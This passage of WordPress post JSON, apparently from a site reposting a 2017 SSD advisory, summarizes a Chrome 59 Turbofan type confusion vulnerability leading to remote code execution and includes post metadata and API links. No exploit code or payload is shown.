class=\"crayon-c\">&lt;\/s<\/span><span class=\"crayon-v\">cript<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0204 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3379\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/Chrome-RCE-300x209.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Wed, 16 Aug 2017 07:21:39 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a type confusion vulnerability that leads to remote code execution found in Chrome browser version 59. Chrome browser is affected by a type confusion vulnerability. The vulnerability results from incorrect optimization by the turbofan compiler, which causes confusion between access to an object array and a value array, and &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3379\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Chrome Turbofan Remote Code Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11682,10757,12136],"class_list":["post-8775","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8775","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=8775"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8775\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=8775"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=8775"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=8775"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}